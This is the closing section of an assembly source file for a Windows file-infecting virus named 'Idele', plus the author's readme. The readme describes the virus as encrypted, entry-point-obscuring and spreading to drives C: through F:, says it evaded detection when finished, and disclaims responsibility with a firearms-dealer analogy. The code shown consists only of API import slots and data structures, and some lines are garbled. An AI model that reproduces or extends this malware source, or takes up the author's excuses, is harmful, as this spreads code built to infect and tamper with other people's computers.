Findfirstfilea DD 0
FindNextFilea DD 0
GetCurrentDirectorya DD 0
GetCurrentProcessid DD 0
GetDriveTypea DD 0
_GetProcaddress DD 0mapViewoffile DD 0
OpenPROCESS DD 0
SetCurrentDirectorya DD 0
STENDOFFILE DD 0
SetFileAttributesa DD 0
SetFilePointer DD 0
SetFileTime DD 0
_SLEEP DD 0
UnmapViewoffile DD 0
WriteProcessMemory DD 0
Variables:
FileHandle DD 0
MapHandle DD 0
MapAddress DD 0
Counter DD 0
CRC DD 0
DEPTH DD 0
ThreadID DD 0
SECTN DD 0
ApioriginalAdd DD 0
API_FIELD DD 0
Search structure:
FileAttributes dd?; Attributes
CREATIONTIME DD?,?; Time of Creation
Last AccessTime DD?,?; Last Access Time
LastWritetime DD?,?; Last ModificationM
FileSizeHigh Dd?; FileSize
FileSize DD?;
RESERVED0 DD?;
RESERVED1 DD?;
FileName DB MaxPath DUP (?); Long FileName
AlternateFileName DB 13 DUP (?); SHORT FileName
DIREXE DB MAXPATH DUP (?)
ENDVIR0:
API_BUFFER:
DD 16 DUP (0)
End host
-------------------------------------------------- -------------- [Idele.asm] ---
-------------------------------------------------- --------------- [Read.1st] ---
DoXTOR L./ [Technology Illusion] Presents:
Idele Virus Version 1.9 July-December 2000
Description:
THIS is a per-process encrypted virus. It uses a new epo (*) Technic
(As Far I Know), Nothing is Modified in The Host Code Part.
The Virus Searchs Targets on C:, D:, E:, F: Drives When Ever Those Drives Are
Accessible.
The Virus Works Fine on Win9X / WIN NT4 Platforms, But Don't work
ON WIN 2K Platform.
This Virus is undtetected at the time it is completed,
YET IT'S NOT DESTRUCTIVE, But It's A Computer Virus So Use it at Your Own
Risks!
I can't Be Held As Responsible for USE / MISUSE OF this Program.
This Program WAS Only Designed for Research AIMS.
(IS Fire Guns Dealers Can Be Held Also As Responsible for the Death of
A Young Guy Somewhere In The World WHENEONE Uses a Machine Gunto Kill Him?)
(*) E.p.o = entry point obscured
-------------------------------------------------- --------------- [Read.1st] ---
